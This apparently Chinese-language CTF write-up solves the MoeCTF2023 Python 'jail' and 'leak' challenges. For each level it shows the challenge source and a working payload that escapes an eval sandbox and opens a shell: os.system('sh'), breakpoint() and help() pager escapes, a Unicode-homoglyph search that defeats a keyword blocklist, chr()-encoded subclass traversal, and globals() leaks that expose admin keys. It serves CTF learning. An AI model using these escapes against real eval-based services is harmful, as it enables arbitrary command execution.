MoeCTF2023_Jail

MoeCTF2023_Jail

Jail Level 0

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{7667mhPKkpUNu21zjvmy3RA9ZSJ3e5TM}

Jail Level 1

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{hYmKR3P74S0BxEnC_V2tQvY9aH22SI8E}

Jail Level 2

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>6:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> os
WARNING: terminal is not fully functional
Press RETURN to continue !sh

!sh
sh: 0: can't access tty; job control turned off
$ cat flag
flag{ywztaDtshMFvz7sQxM-U2VdFWqsGkK1u}

Jail Level 3

Source Code

import re
BANLIST = ['breakpoint']
BANLIST_WORDS = '|'.join(f'({WORD})' for WORD in BANLIST)
print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
print("Oh hacker! Bye~")
exit(0)
if re.findall(BANLIST_WORDS, user_input_data, re.I):
raise Exception('Blacklisted word detected! you are hacker!')
print('Answer result: {}'.format(eval(user_input_data)))

exp

字符编码绕过

s = 'breakpoint()'

for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if res in s and len(res) > 0:
            print(f"ascii:{i}  A:{res}  U:{tmp}  payload:{s.replace(res,tmp)}")
    except:
        pass
# ascii:170  A:a  U:ª  payload:breªkpoint()
# ascii:186  A:o  U:º  payload:breakpºint()
# ascii:691  A:r  U:ʳ  payload:bʳeakpoint()
# ascii:8305  A:i  U:ⁱ  payload:breakpoⁱnt()
# ascii:8317  A:(  U:⁽  payload:breakpoint⁽)
# ascii:8318  A:)  U:⁾  payload:breakpoint(⁾
# ascii:8319  A:n  U:ⁿ  payload:breakpoiⁿt()
# ascii:8333  A:(  U:₍  payload:breakpoint₍)
# ascii:8334  A:)  U:₎  payload:breakpoint(₎
# ascii:8464  A:i  U:ℐ  payload:breakpoℐnt()
# ascii:8465  A:i  U:ℑ  payload:breakpoℑnt()
# ascii:8469  A:n  U:ℕ  payload:breakpoiℕt()
# ascii:8473  A:p  U:ℙ  payload:breakℙoint()
# ascii:8475  A:r  U:ℛ  payload:bℛeakpoint()
# ascii:8476  A:r  U:ℜ  payload:bℜeakpoint()
# ascii:8477  A:r  U:ℝ  payload:bℝeakpoint()
# ascii:8490  A:k  U:K  payload:breaKpoint()
# ascii:8492  A:b  U:ℬ  payload:ℬreakpoint()
# ascii:8495  A:e  U:ℯ  payload:brℯakpoint()
# ascii:8496  A:e  U:ℰ  payload:brℰakpoint()
# ascii:8500  A:o  U:ℴ  payload:breakpℴint()
# ascii:8505  A:i  U:ℹ  payload:breakpoℹnt()
# ascii:8519  A:e  U:ⅇ  payload:brⅇakpoint()
# ascii:8520  A:i  U:ⅈ  payload:breakpoⅈnt()
# ascii:8544  A:i  U:Ⅰ  payload:breakpoⅠnt()
# ascii:8560  A:i  U:ⅰ  payload:breakpoⅰnt()
# ascii:9398  A:a  U:Ⓐ  payload:breⒶkpoint()
# ascii:9399  A:b  U:Ⓑ  payload:Ⓑreakpoint()
# ascii:9402  A:e  U:Ⓔ  payload:brⒺakpoint()
# ascii:9406  A:i  U:Ⓘ  payload:breakpoⒾnt()
# ascii:9408  A:k  U:Ⓚ  payload:breaⓀpoint()
# ascii:9411  A:n  U:Ⓝ  payload:breakpoiⓃt()
# ascii:9412  A:o  U:Ⓞ  payload:breakpⓄint()
# ascii:9413  A:p  U:Ⓟ  payload:breakⓅoint()
# ascii:9415  A:r  U:Ⓡ  payload:bⓇeakpoint()
# ascii:9417  A:t  U:Ⓣ  payload:breakpoinⓉ()
# ascii:9424  A:a  U:ⓐ  payload:breⓐkpoint()
# ascii:9425  A:b  U:ⓑ  payload:ⓑreakpoint()
# ascii:9428  A:e  U:ⓔ  payload:brⓔakpoint()
# ascii:9432  A:i  U:ⓘ  payload:breakpoⓘnt()
# ascii:9434  A:k  U:ⓚ  payload:breaⓚpoint()
# ascii:9437  A:n  U:ⓝ  payload:breakpoiⓝt()
# ascii:9438  A:o  U:ⓞ  payload:breakpⓞint()
# ascii:9439  A:p  U:ⓟ  payload:breakⓟoint()
# ascii:9441  A:r  U:ⓡ  payload:bⓡeakpoint()
# ascii:9443  A:t  U:ⓣ  payload:breakpoinⓣ()
# ascii:13260  A:in  U:㏌  payload:breakpo㏌t()
# ascii:65077  A:(  U:︵  payload:breakpoint︵)
# ascii:65078  A:)  U:︶  payload:breakpoint(︶
# ascii:65113  A:(  U:﹙  payload:breakpoint﹙)
# ascii:65114  A:)  U:﹚  payload:breakpoint(﹚
# ascii:65288  A:(  U:(  payload:breakpoint()
# ascii:65289  A:)  U:)  payload:breakpoint()
# ascii:65313  A:a  U:A  payload:breAkpoint()
# ascii:65314  A:b  U:B  payload:Breakpoint()
# ascii:65317  A:e  U:E  payload:brEakpoint()
# ascii:65321  A:i  U:I  payload:breakpoInt()
# ascii:65323  A:k  U:K  payload:breaKpoint()
# ascii:65326  A:n  U:N  payload:breakpoiNt()
# ascii:65327  A:o  U:O  payload:breakpOint()
# ascii:65328  A:p  U:P  payload:breakPoint()
# ascii:65330  A:r  U:R  payload:bReakpoint()
# ascii:65332  A:t  U:T  payload:breakpoinT()
# ascii:65345  A:a  U:a  payload:breakpoint()
# ascii:65346  A:b  U:b  payload:breakpoint()
# ascii:65349  A:e  U:e  payload:breakpoint()
# ascii:65353  A:i  U:i  payload:breakpoint()
# ascii:65355  A:k  U:k  payload:breakpoint()
# ascii:65358  A:n  U:n  payload:breakpoint()
# ascii:65359  A:o  U:o  payload:breakpoint()
# ascii:65360  A:p  U:p  payload:breakpoint()
# ascii:65362  A:r  U:r  payload:breakpoint()
# ascii:65364  A:t  U:t  payload:breakpoint()
>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
cat flag
flag{Vg03aw9uswciSrMEbSuhsW7hyef89_k2}

Jail Level 4

Welcome to the MoeCTF2023 Jail challenge.This is a repeater and it repeats what you say!
python verison:2.7
> __import__('os').system('sh')
sh: 0: can't access tty; job control turned off
$ cat flag
flag{cAWccu_EE6gKWg1XWHB7uDTQY70IJWv2}

Jail Level 5

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
def func_filter(s):
  not_allowed = set('"'`bid')
  return any(c in not_allowed for c in s)
user_input_data = input("> ")
if func_filter(user_input_data):
  print("Oh hacker! Bye~")
  exit(0)
if not user_input_data.isascii():
  print("Sorry we only ascii for this chall!")
  exit(0)
print('Answer result: {}'.format(eval(user_input_data)))

exp

构造:().class.base.subclasses()[-4].init.globals’system’

利用getattr(),chr()绕过:getattr(getattr(getattr(getattr(().class, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> getattr(getattr(getattr(getattr(().__class__, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))
ls
flag_9af31874439b2aad
server.py
cat flag_9af31874439b2aad
moectf{GsFYUbxaK8VNeW6ohhIn1N42EnqKv7PQ}

Leak Level 0

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
print("| Options:
|       [V]uln
|       [B]ackdoor")
def func_filter(s):
  not_allowed = set('vvvveeee')
  return any(c in not_allowed for c in s)
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>9):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_valid_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fc2f593cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_6366a131649a4e9b': '4e86eda06366a131649a4e9be1a9f217', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _  ___  \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | |/ _ \\ \n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| | | | |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ | | | |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ | |_| |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_|\\___/ \n                                  \\____/                                 \n
                                                             \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    def func_filter(s):\n      not_allowed = set(\'vvvveeee\')\n      return any(c in not_allowed for c in s)\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>9):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_valid_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7fc2f599e0e0>, 'challenge_choice': 'v', 'code': 'globals()'}
>>> b
Please enter the admin key
key >> 4e86eda06366a131649a4e9be1a9f217
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{E1iKuuMPXcNIYBamRpTdbCqmMeEHp8ud}

Leak Level 1

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
def func_filter(s):
  not_allowed = set('moe_dbt')
  return any(c in not_allowed for c in s)
print("| Options:
|       [V]uln
|       [B]ackdoor")
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>6):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_vailed_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> vars()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7feb7a85cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_ff8457ee50ed8d0f': '8d3d451fff8457ee50ed8d0f24881eac', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _ __ \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | /_ |\n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| || |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ || |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ || |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_||_|\n                                  \\____/
            \n
                                       \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    def func_filter(s):\n      not_allowed = set(\'moe_dbt\')\n      return any(c in not_allowed for c in s)\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>6):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_vailed_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7feb7a8be0e0>, 'challenge_choice': 'v', 'code': 'vars()'}
>>> b
Please enter the admin key
key >> 8d3d451fff8457ee50ed8d0f24881eac
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{tg2GYrhoUnsx6A_Na6qXnk3I4s0cibWH}

Leak Level 2

Source Code

  fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
    print("| Options:
|       [V]uln
|       [B]ackdoor")
    def func_filter(s):
      not_allowed = set('dbtaaaaaaaaa!')
      return any(c in not_allowed for c in s)
    while(1):
      challenge_choice = input(">>> ").lower().strip()
      if challenge_choice == 'v':
        print("you need to ")
        code = input("code >> ")
        if(len(code)>6):
          print("you're hacker!")
          exit(0)
        if func_filter(code):
          print("Oh hacker! byte~")
          exit(0)
        if not code.isascii():
          print("please use ascii only thanks!")
          exit(0)
        print(eval(code))
      elif challenge_choice == 'b':
        print("Please enter the admin key")
        key = input("key >> ")
        if(key == fake_key_into_local_but_vailed_key_into_remote):
          print("Hey Admin,please input your code:")
          code = input("backdoor> ")
          print(eval(code))
      else:
        print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> __main__
Help on module __main__:

NAME
    __main__

FUNCTIONS
    func_filter(s)

DATA
    CHALLENGE_SOURCE_CODE = '\n    fake_key_into_local_but_valid_key_into_...
    WELCOME = '\n  __  __  ___       _      ______        _  __ ...       ...
    __annotations__ = {}
    challenge_choice = 'v'
    choice = 'e'
    code = 'help()'
    key_f5ee1754b2e73acf = '43610e2ef5ee1754b2e73acf35348dd5'

FILE
    /home/ctf/server.py
>>> b
Please enter the admin key
key >> 43610e2ef5ee1754b2e73acf35348dd5
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{bDLQw0_0cwm9Ef63vWy3rIQiy2xpM5uh}
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值